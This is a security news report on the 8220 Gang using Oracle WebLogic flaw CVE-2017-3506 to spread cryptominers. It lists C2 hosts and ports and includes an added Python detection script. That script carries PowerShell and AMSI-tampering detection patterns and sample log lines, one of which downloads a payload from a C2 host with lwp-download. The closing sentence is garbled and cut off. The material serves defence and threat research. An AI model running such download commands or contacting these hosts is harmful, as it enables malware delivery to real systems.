
A six-year-old security flaw in Oracle WebLogic servers is being weaponized by a notorious cryptojacking group tracked as 8220 Gang to trap vulnerable instances in a botnet and distribute cryptocurrency mining malware.
The flaw in question is CVE-2017-3506 (CVSS score: 7.4), which, if successfully exploited, could allow an unauthenticated remote attacker to execute arbitrary commands.
“This could allow an attacker to gain unauthorized access to sensitive data or compromise an entire system,” Trend Micro researcher Sunil Bharti said in a report released this week.
The 8220 Gang was first documented by Cisco Talos in late 2018 and is named after its original use of port 8220 for command and control (C2) network communications.
SentinelOne noted last year that “the 8220 Gang identifies targets by scanning the public Internet for misconfigured or vulnerable hosts,” adding that “the 8220 Gang is known to utilize SSH brute force attacks as it seeks lateral movement within compromised networks after infection.”
Earlier this year, Sysdig detailed attacks carried out by the “low-skilled” crimeware group between November 2022 and January 2023 with the goal of compromising vulnerable Oracle WebLogic and Apache web servers and deploying cryptocurrency miners.

The group has also been observed utilizing an off-the-shelf malware downloader known as PureCrypter and a crypter codenamed ScrubCrypt to hide its miner payload and avoid detection by security software.
The latest attack chain documented by Trend Micro leverages a vulnerability in Oracle WebLogic Server to deliver a PowerShell payload that is used to create another obfuscated PowerShell script in memory.
This newly created PowerShell script disables Windows Antimalware Scanning Interface (AMSI) detection and launches Windows binaries, which then contact a remote server and retrieve the “meticulously obfuscated” payload.
An intermediate DLL file is configured to download a cryptocurrency miner from one of three C2 servers, 179.43.155[.]202, work.letmaker[.]top, and su-94.letmaker[.]top, using TCP ports 9090, 9091, or 9092.
According to Trend Micro, the recent attack also used a legitimate Linux tool called lwp-download to save arbitrary files onto compromised hosts.
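The attack chain above (obfuscated PowerShell with AMSI tampering, lwp-download abuse, and miner downloads from the listed C2 hosts and ports) gives a defender three concrete things to hunt for. The following script is an added example, not code from Trend Micro or the article: it runs simple rules over constructed endpoint and network log lines. The C2 hosts and ports come from the article; the PowerShell marker strings and the key=value log format are assumptions.

```python
import re
from typing import Dict, List

# Indicators quoted in the article: the miner's C2 hosts and ports (defanging brackets removed).
C2_HOSTS = {"179.43.155.202", "work.letmaker.top", "su-94.letmaker.top"}
C2_PORTS = {9090, 9091, 9092}

# Assumed generic markers for encoded/hidden PowerShell and AMSI tampering (common detection strings).
PS_MARKERS = re.compile(r"amsiutils|amsiinitfailed|-enc(odedcommand)?\b|frombase64string|-w(indowstyle)?\s+hidden", re.I)
DST_RE = re.compile(r"dst=([\w.\-]+):(\d+)")


def classify(line: str) -> List[str]:
    """Return the names of the rules that fire on one log line (empty list if nothing matches)."""
    hits: List[str] = []
    low = line.lower()
    if "powershell" in low and PS_MARKERS.search(line):
        hits.append("suspicious_powershell")
    if re.search(r"\blwp-download\b", low):
        hits.append("lwp_download_abuse")
    if any(host in low for host in C2_HOSTS):
        hits.append("c2_contact")  # high confidence: a known C2 host appears anywhere in the line
    else:
        m = DST_RE.search(low)
        if m and int(m.group(2)) in C2_PORTS:
            hits.append("c2_port_candidate")  # lower confidence: only the port matches, review manually
    return hits


def scan(lines: List[str]) -> Dict[int, List[str]]:
    """Map line index -> fired rules for every line that triggered at least one rule."""
    result: Dict[int, List[str]] = {}
    for i, line in enumerate(lines):
        hits = classify(line)
        if hits:
            result[i] = hits
    return result


# Constructed sample log lines (not real telemetry), in an assumed key=value format.
SAMPLE_LOG = [
    '2023-05-10T10:01:02 host=win-app1 proc=powershell.exe cmd="powershell -nop -w hidden -enc <base64 omitted>"',
    '2023-05-10T10:01:09 host=win-app1 proc=powershell.exe cmd="powershell Get-Service"',
    '2023-05-10T10:02:10 host=web-lnx1 proc=sh cmd="lwp-download http://work.letmaker.top/files/payload.bin /tmp/payload.bin"',
    '2023-05-10T10:02:12 host=web-lnx1 conn dst=179.43.155.202:9090 proto=tcp',
    '2023-05-10T10:02:30 host=web-lnx1 conn dst=10.0.0.5:9091 proto=tcp',
    '2023-05-10T10:03:00 host=web-lnx1 conn dst=updates.example.com:443 proto=tcp',
]

if __name__ == "__main__":
    for idx, fired in scan(SAMPLE_LOG).items():
        print(f"line {idx}: {', '.join(fired)}")
```

The port-only rule is deliberately separated from the host rule because 9090-9092 are common service ports; treat it as a triage hint rather than an alert on its own.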
“lwp-download is a Linux utility that exists by default on many platforms, and if the 8220 Gang made it part of their malware routine, it could impact many services, even if it were reused multiple times,” said Bharti.
“Given the tendency of attackers to reuse tools for different campaigns and to abuse legitimate tools as part of their arsenal, an organization’s security team should consider other may be required to find detection and blocking solutions for